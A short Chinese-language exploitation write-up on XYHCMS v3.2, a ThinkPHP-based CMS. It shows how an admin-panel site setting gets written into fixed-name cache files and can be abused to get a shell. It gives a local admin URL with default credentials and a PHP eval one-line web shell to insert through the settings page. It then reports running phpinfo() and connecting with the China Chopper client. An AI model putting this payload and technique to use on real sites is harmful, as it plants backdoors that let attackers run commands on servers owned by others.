一大帮水军正在来袭.......
XYHCMS
行云海CMS(XYHCMS)是完全源码开放的一套CMS内容管理系统,使用简单,轻松建站。企业建站、个人博客、个性网站的首选。系统简洁,高效,易用,一般的开发人员能够使用本系统以最低的成本、最少的人力投入,在最短的时间内架设一个功能齐全、性能优异的网站。
xyhcms和Jymusic cms一样使用了ThinkPHP框架,这里不赘述,直接给出缓存文件的位置
先看一下管理员登录页面的源代码,看到核心入口为ThinkPHP.php,找到并打开查看
图片.png
发现应用缓存目录为Temp文件夹ThinkPHP.php
图片.png
打开Temp文件夹会发现有很多缓存文件,我们随便打开即可看看,可以发现里面的内容有点像网站配置信息
图片.png
所以我们在后台的网站设置处插入一句话,就会被ThinkPHP写入缓存文件。而且这个缓存文件的文件名都是固定不变的,这也是导致getshell的原因。
访问后台路径
http://127.0.0.1/xyhcms_v3.2/uploads_code/xyhai.php?s=/Index/index
用户名和密码:xyhcms 123456
<?php @eval($_POST[‘cmd’]);?>
图片.png
成功插入后,我们来执行一下phpinfo()函数看看,菜刀也能成功连接
图片.png
图片.png
